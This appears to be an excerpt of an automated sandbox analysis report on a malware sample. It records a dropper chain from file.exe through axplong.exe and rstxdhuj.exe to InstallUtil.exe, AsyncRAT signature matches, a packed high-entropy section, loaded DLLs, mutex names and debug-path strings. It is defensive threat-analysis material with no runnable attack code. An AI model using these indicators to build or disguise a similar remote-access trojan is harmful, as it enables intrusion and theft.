Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F2121 10_2_008F2121
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F2458 10_2_008F2458
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F879B 10_2_008F879B
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F87A8 10_2_008F87A8
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F0E91 10_2_008F0E91
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F0EDA 10_2_008F0EDA
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F8E30 10_2_008F8E30
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F0F51 10_2_008F0F51
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F140F 10_2_008F140F
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F17E5 10_2_008F17E5
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F18E3 10_2_008F18E3
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_049D0B10 10_2_049D0B10
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_049D0B01 10_2_049D0B01
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059B3F18 10_2_059B3F18
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059BC148 10_2_059BC148
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059BA030 10_2_059BA030
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059B3F08 10_2_059B3F08
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059BAE8C 10_2_059BAE8C
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059BC138 10_2_059BC138
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059BA020 10_2_059BA020
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059BB200 10_2_059BB200
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059B424D 10_2_059B424D
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059CD1C0 10_2_059CD1C0
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059C9170 10_2_059C9170
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059CFC88 10_2_059CFC88
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059C3A58 10_2_059C3A58
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059CD1B0 10_2_059CD1B0
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059C915F 10_2_059C915F
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059CFC78 10_2_059CFC78
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059DACE0 10_2_059DACE0
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059D142C 10_2_059D142C
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059D0040 10_2_059D0040
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059DBA78 10_2_059DBA78
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059DA559 10_2_059DA559
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059DA568 10_2_059DA568
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059DACD0 10_2_059DACD0
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059D5180 10_2_059D5180
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059D4118 10_2_059D4118
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059D4108 10_2_059D4108
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059D516F 10_2_059D516F
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059DBA68 10_2_059DBA68
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05AD7DB1 10_2_05AD7DB1
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05ADBDC0 10_2_05ADBDC0
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05ADF410 10_2_05ADF410
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05AD8BE0 10_2_05AD8BE0
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05ADCFB8 10_2_05ADCFB8
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05ADC0E7 10_2_05ADC0E7
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05AD0040 10_2_05AD0040
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05AD8BD0 10_2_05AD8BD0
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05BA0006 10_2_05BA0006
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05BA0040 10_2_05BA0040
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05E3DF18 10_2_05E3DF18
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05E3D270 10_2_05E3D270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 11_2_02C113B8 11_2_02C113B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4684 -s 904
Source: 5.exe.9.dr Static PE information: Number of sections : 12 > 10
Source: 5[1].exe.9.dr Static PE information: Number of sections : 12 > 10
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.2.rstxdhuj.exe.365fdb0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.2.rstxdhuj.exe.3611590.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.2669149156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000002.2005733540.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000002.2018046376.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: rstxdhuj.exe.9.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: rstxdhuj[1].exe.9.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Ylrdnrwcx.exe.10.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static PE information: Section: ZLIB complexity 0.9974082510217984
Source: file.exe Static PE information: Section: ekhnjnoj ZLIB complexity 0.9941347456351596
Source: axplong.exe.0.dr Static PE information: Section: ZLIB complexity 0.9974082510217984
Source: axplong.exe.0.dr Static PE information: Section: ekhnjnoj ZLIB complexity 0.9941347456351596
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/8@1/3
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\rstxdhuj[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: \Sessions\1\BaseNamedObjects\TSXTkO0pNBdN2KNw
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1280:64:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe "C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe"
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4684 -s 904
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe "C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe"
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wtsapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winsta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: file.exe Static file information: File size 1904128 > 1048576
Source: file.exe Static PE information: Raw size of ekhnjnoj is bigger than: 0x100000 < 0x19f400
Source: Binary string: HP<o8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdbMg` source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: rstxdhuj.exe, 0000000A.00000002.2005733540.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2018046376.0000000003599000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2018046376.0000000003611000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2027391076.0000000005B30000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: ((.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: rstxdhuj.exe, 0000000A.00000002.2005733540.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2018046376.0000000003599000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2018046376.0000000003611000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2027391076.0000000005B30000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbx source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000F83000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: rstxdhuj.exe, 0000000A.00000002.2026739271.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: rstxdhuj.exe, 0000000A.00000002.2026739271.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000F83000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.000000000101B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDB source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: @Ho.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.000000000101B000.00000004.00000020.00020000.00000000.sdmp
